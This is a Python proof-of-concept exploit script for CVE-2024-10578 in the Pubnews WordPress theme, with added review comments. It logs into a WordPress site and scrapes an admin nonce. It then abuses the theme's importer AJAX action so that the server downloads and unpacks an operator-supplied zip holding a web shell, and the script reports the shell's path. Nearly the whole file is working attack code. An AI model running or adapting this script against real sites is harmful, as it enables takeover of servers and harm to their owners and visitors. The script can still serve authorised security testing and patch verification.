import argparse
import re
import sys

import requests


# Exploit By Nxploited , Khaled Alenazi


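# The nonce is embedded in an inline JS object on the pubnews-info admin page.
# re.DOTALL keeps the lazy `.*?` working when that object is pretty-printed
# across several lines; the original single-line pattern silently missed it.
_NONCE_RE = re.compile(
    r'var pubnewsThemeInfoObject = {.*?"_wpnonce":"([^"]+)"',
    re.DOTALL,
)

_USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"


def _login(session, base_url, username, password, timeout):
    """POST the wp-login.php form and report whether a login cookie was set.

    Success is inferred from a ``wordpress_logged_in*`` cookie landing in the
    session jar (the same check the original PoC used); the response body is
    not inspected, so a captcha/2FA interstitial simply shows up as "failed".
    """
    session.post(
        base_url + '/wp-login.php',
        data={
            'log': username,
            'pwd': password,
            'rememberme': 'forever',
            'wp-submit': 'Log+In',
        },
        headers={"User-Agent": _USER_AGENT},
        timeout=timeout,
    )
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)


def _fetch_nonce(session, base_url, timeout):
    """Scrape the ``_wpnonce`` from the pubnews-info admin page; None if absent.

    The nonce is tied to the logged-in user, so this must run on the same
    session that performed the login.
    """
    response = session.get(
        base_url + '/wp-admin/admin.php?page=pubnews-info',
        headers={"User-Agent": _USER_AGENT},
        timeout=timeout,
    )
    match = _NONCE_RE.search(response.text)
    return match.group(1) if match else None


def _install_plugin(session, base_url, nonce, plugin_url, plugin_main_file, timeout):
    """Call the theme's ``pubnews_importer_plugin_action`` AJAX handler.

    The *target* downloads ``plugin_url`` itself, so the zip must be reachable
    from the WordPress host, not just from the operator's machine. Returns the
    raw admin-ajax.php response for the caller to interpret.
    """
    headers = {
        "User-Agent": _USER_AGENT,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": base_url + '/wp-admin/admin.php?page=pubnews-info',
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": base_url,
        "Connection": "keep-alive",
    }
    # No hand-built Cookie header: the session jar already carries the login
    # cookies, and requests overwrites an explicit Cookie header with the jar
    # contents anyway, so the original copy was redundant.
    data = {
        'action': 'pubnews_importer_plugin_action',
        '_wpnonce': nonce,
        'plugin_action': 'not-installed',
        'link': plugin_url,
        'file': plugin_main_file,
        'importer_or_not': 'true',
    }
    return session.post(
        base_url + '/wp-admin/admin-ajax.php',
        headers=headers,
        data=data,
        timeout=timeout,
    )


def main():
    """Run the CVE-2024-10578 PoC end to end from command-line flags.

    Steps: (1) log in via wp-login.php, (2) scrape the ``_wpnonce`` from
    ``admin.php?page=pubnews-info``, (3) POST the theme's importer AJAX action
    with a remote zip URL that the target fetches and unpacks into
    ``wp-content/plugins/``.

    Exits with status 1 on any failed step or network error (the original
    used bare ``exit()``, which reported success to the calling shell).
    Only run this against systems you are authorised to test.
    """
    parser = argparse.ArgumentParser(description='Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited , Khaled alenazi')
    parser.add_argument('-u', '--url', required=True, help='The URL of the WordPress site')
    parser.add_argument('-un', '--username', required=True, help='The username for WordPress login')
    parser.add_argument('-p', '--password', required=True, help='The password for WordPress login')
    parser.add_argument('-url_zip', '--plugin_url', required=True, help='The plugin URL to install (must be a zip file with the shell injected inside)')
    parser.add_argument('-t', '--timeout', type=float, default=30.0,
                        help='Per-request timeout in seconds (default: 30); the original had none and could hang forever')

    args = parser.parse_args()

    # NOTE(review): the description says "Unauthenticated", but every request
    # below rides on a wp-login.php session, so valid credentials are
    # mandatory. Which role those credentials need is not established here.
    base_url = args.url.rstrip('/')  # avoid '//wp-login.php' when the URL has a trailing slash

    session = requests.Session()
    # TLS verification is disabled so the PoC works against lab targets with
    # self-signed certs. It also leaves the credentials and session cookie
    # open to interception, so do not use this over a network you don't trust.
    requests.packages.urllib3.disable_warnings()
    session.verify = False

    # Derived from the zip filename: <slug>/<slug>.php mirrors WordPress's
    # plugin-basename convention. The PoC assumes the supplied zip is laid out
    # that way; if it isn't, the 'file' value the handler receives is wrong.
    plugin_slug = args.plugin_url.split('/')[-1].replace('.zip', '')
    plugin_main_file = f"{plugin_slug}/{plugin_slug.split('.')[0]}.php"

    try:
        if not _login(session, base_url, args.username, args.password, args.timeout):
            print("[-] Failed to log in.")
            sys.exit(1)
        print("[+] Logged in successfully.")

        nonce = _fetch_nonce(session, base_url, args.timeout)
        if nonce is None:
            print("[-] Failed to extract admin _wpnonce.")
            sys.exit(1)
        print(f"[+] Admin _wpnonce extracted: {nonce}")

        response = _install_plugin(session, base_url, nonce, args.plugin_url,
                                   plugin_main_file, args.timeout)
    except requests.RequestException as exc:
        # Connection refused, DNS failure, timeout: report instead of tracebacking.
        print(f"[-] Request failed: {exc}")
        sys.exit(1)

    # Success heuristic inherited from the original PoC: HTTP 200 and the word
    # "status" somewhere in the body. The handler's reply format is not known
    # here, so an error reply that happens to carry a "status" field would be
    # misreported as success; verify the plugin directory exists before
    # relying on it.
    if response.status_code == 200 and 'status' in response.text:
        print("[+] Plugin installed successfully.")
        print(f"[+] Plugin extracted. You can find the shell here: /wp-content/plugins/{plugin_slug}/")
    else:
        print(f"[-] Failed to install plugin. Status code: {response.status_code}")
        print(response.text)
        sys.exit(1)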

# Script entry point: only run the PoC when executed directly, not on import.
if __name__ == "__main__":
    main()